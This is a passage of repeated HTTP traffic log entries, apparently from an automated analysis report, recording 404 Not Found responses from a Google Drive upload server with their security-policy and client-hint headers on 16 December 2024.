ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5mzjZJ1NFRpZh4ZMqh395b73KuHDMHpEgaQDF2vwMLduOaoqCYvlMp_MYG3wjklfY-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-cr-JOXlWaUrE5GZfAAnGbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5nw7cjBzLm7BtzbEOlRDK4FZ7pAF95XnR5_6L8wV-p8HJTgEZa_18U28XVf5s1_vfvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-FeAwgmcsX4Tmc1sGs1Y0Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Sosdq_AGSw5wUv9M5HRx-BKBdm8xImR4rjZnEnaFxetA17cdkb9OyEAiD8YcLOxATContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-0GQwbYS0UpQC8Y0D7-z3Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5bUB0kABd5YNamKEYeXgAAr2_8co0-ZS7cngZwnd4-FSUPM28GCusX9jwxKZLQMMIsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-NK0SWxPBuPpqb3kA5ZGMpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4L9L_5xGIOBGxGvzwlgDuEV4sAUuS5KMFzRHVyZP3o7EVe1bHCElAeMdUyCGbR4kdTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-mV48Bs3rtx-9UWh8K119sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lRNZc6u7DJPO2HzKnuWftVgwaVWAIKGIlYgL1a_ZIcerDNNpfhSpbx7-pG4zARFrZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:12 GMTContent-Security-Policy: script-src 'nonce-fCxnZETHthfpMs051sAoHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70sfg7GGe-rm1nh9YPmU_wWbI51LQ_M26X60qUXXEgtkVx_EnBAXMAO1lD0Educ1VOContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-QRQeOCPHesK7WpgSOgqZdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ENJUW9YDNtqr91CXExvPDiKec78JJ-aSJG3E6-CbMaWA6RXmxY9pvwZNBmVRpXON5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-6m_NedVDerj5VWVdAx2a7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Rn3ZSk2YusbqWeC-xe0HlNwUBSdJEsh5dulQ-8fhZ6y-S5IYzKnUCtespAhAbDKwNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-cKUTA4beyHyle-T6IgySpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC55gEjPcwPIkiKeViFnktnNt2m9EBXdbAqyNvvmGFR9BdBnSisRSNH7j1tle65LpoiUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:34 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-vz4pdYJI02uB_MBo4kA2GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6-UKSDFlAHi5iY25XwYzkRsM13FxcWxPINHyuX3J8JMWPVJuYJTyF49xGyHjdEEbS-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:40 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-7UiBQj70X_oDWzDZG3YyaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC72YZqPZLiumLD5Y8Jy1CXnGGiwztTeQAjxncm_vbrK8efY83I3jPM7macU6A4sQSKPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:45 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-b8pNSnWb6XVc0LERxp-cVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7yc2n6SdIuTuYUNVjoWTVC1IGdOvIDzPcXcMBs-QlxPlzoDaWxM7eeQnDgD1eQDnFKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:51 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-j_ulvRD_YUGWkhRTgdKpDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6YjTfEhJPw5sAKvMfpolIKVBDRw9THWaXRxGVwARYJ6R9XQq_eY1_y9ju61236nCzPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-VixMaL7CJ91CD6gpyAhnKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6YkRbkhsPgabLfwdRj3a0Um4M52cmg7s82KXAxASjBrJiR_diGnEX1gQ-BMAsVi5rAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:01 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-gIhWpheFdd3bBCoyhR1Wvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; 